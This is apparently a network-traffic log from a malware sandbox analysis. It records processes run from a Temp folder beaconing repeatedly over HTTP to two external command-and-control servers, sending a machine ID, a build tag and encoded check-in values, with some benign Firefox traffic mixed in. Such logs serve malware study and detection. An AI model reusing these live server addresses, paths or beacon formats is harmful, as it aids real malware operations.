Sep 6, 2024 09:58:16.824513912 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 6, 2024 09:58:16.839005947 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:58:17.072287083 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.7	49744	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:58:17.254513979 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:58:17.940279961 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 6, 2024 09:58:17.970772028 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:58:18.203072071 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.7	49749	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:58:18.366990089 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:58:19.069739103 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 6, 2024 09:58:19.096915960 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:58:19.327188015 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.7	49758	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:58:19.603224039 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:58:20.287305117 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 6, 2024 09:58:20.324762106 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:58:20.550503016 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.7	49761	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:58:20.766619921 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:58:21.458879948 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 6, 2024 09:58:21.634015083 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:58:21.858117104 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.7	49768	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:58:22.404973984 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:58:23.075707912 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 6, 2024 09:58:23.124557972 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:58:23.351120949 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.7	49775	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:58:23.492496967 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:58:24.186252117 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 6, 2024 09:58:24.207622051 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:58:24.431849003 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.7	49784	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:58:24.611799955 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:58:25.304928064 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 6, 2024 09:58:25.346664906 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:58:25.573569059 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.7	49786	34.107.221.82	80	5932	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:58:25.347114086 CEST	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Sep 6, 2024 09:58:25.971617937 CEST	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Thu, 05 Sep 2024 10:01:34 GMT Age: 79011 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Sep 6, 2024 09:58:26.382628918 CEST	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Thu, 05 Sep 2024 10:01:34 GMT Age: 79011 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Sep 6, 2024 09:58:26.384984970 CEST	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Thu, 05 Sep 2024 10:01:34 GMT Age: 79011 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Sep 6, 2024 09:58:35.988604069 CEST	6	OUT	Data Raw: 00 Data Ascii:
Sep 6, 2024 09:58:45.997217894 CEST	6	OUT	Data Raw: 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.7	49790	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:58:25.720439911 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:58:26.456512928 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 6, 2024 09:58:26.458545923 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:58:26.688019991 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.7	49791	185.215.113.100	80	1568	C:\Users\user\AppData\Local\Temp\1000030001\88b8632b35.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:58:26.399338007 CEST	90	OUT	GET / HTTP/1.1 Host: 185.215.113.100 Connection: Keep-Alive Cache-Control: no-cache
Sep 6, 2024 09:58:27.136054039 CEST	203	IN	HTTP/1.1 200 OK Date: Fri, 06 Sep 2024 07:58:27 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 6, 2024 09:58:27.164499044 CEST	413	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DAEBFHJKJEBFCBFHDAEG Host: 185.215.113.100 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 41 45 42 46 48 4a 4b 4a 45 42 46 43 42 46 48 44 41 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 36 31 32 36 37 36 39 44 37 33 32 33 36 35 33 31 34 33 38 39 38 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 42 46 48 4a 4b 4a 45 42 46 43 42 46 48 44 41 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6c 65 76 61 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 42 46 48 4a 4b 4a 45 42 46 43 42 46 48 44 41 45 47 2d 2d 0d 0a Data Ascii: ------DAEBFHJKJEBFCBFHDAEGContent-Disposition: form-data; name="hwid"E6126769D7323653143898------DAEBFHJKJEBFCBFHDAEGContent-Disposition: form-data; name="build"leva------DAEBFHJKJEBFCBFHDAEG--
Sep 6, 2024 09:58:27.387564898 CEST	413	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DAEBFHJKJEBFCBFHDAEG Host: 185.215.113.100 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 41 45 42 46 48 4a 4b 4a 45 42 46 43 42 46 48 44 41 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 36 31 32 36 37 36 39 44 37 33 32 33 36 35 33 31 34 33 38 39 38 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 42 46 48 4a 4b 4a 45 42 46 43 42 46 48 44 41 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6c 65 76 61 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 42 46 48 4a 4b 4a 45 42 46 43 42 46 48 44 41 45 47 2d 2d 0d 0a Data Ascii: ------DAEBFHJKJEBFCBFHDAEGContent-Disposition: form-data; name="hwid"E6126769D7323653143898------DAEBFHJKJEBFCBFHDAEGContent-Disposition: form-data; name="build"leva------DAEBFHJKJEBFCBFHDAEG--
Sep 6, 2024 09:58:27.688446045 CEST	413	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DAEBFHJKJEBFCBFHDAEG Host: 185.215.113.100 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 41 45 42 46 48 4a 4b 4a 45 42 46 43 42 46 48 44 41 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 36 31 32 36 37 36 39 44 37 33 32 33 36 35 33 31 34 33 38 39 38 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 42 46 48 4a 4b 4a 45 42 46 43 42 46 48 44 41 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6c 65 76 61 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 42 46 48 4a 4b 4a 45 42 46 43 42 46 48 44 41 45 47 2d 2d 0d 0a Data Ascii: ------DAEBFHJKJEBFCBFHDAEGContent-Disposition: form-data; name="hwid"E6126769D7323653143898------DAEBFHJKJEBFCBFHDAEGContent-Disposition: form-data; name="build"leva------DAEBFHJKJEBFCBFHDAEG--
Sep 6, 2024 09:58:28.486819983 CEST	210	IN	HTTP/1.1 200 OK Date: Fri, 06 Sep 2024 07:58:28 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.7	49792	34.107.221.82	80	5932	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
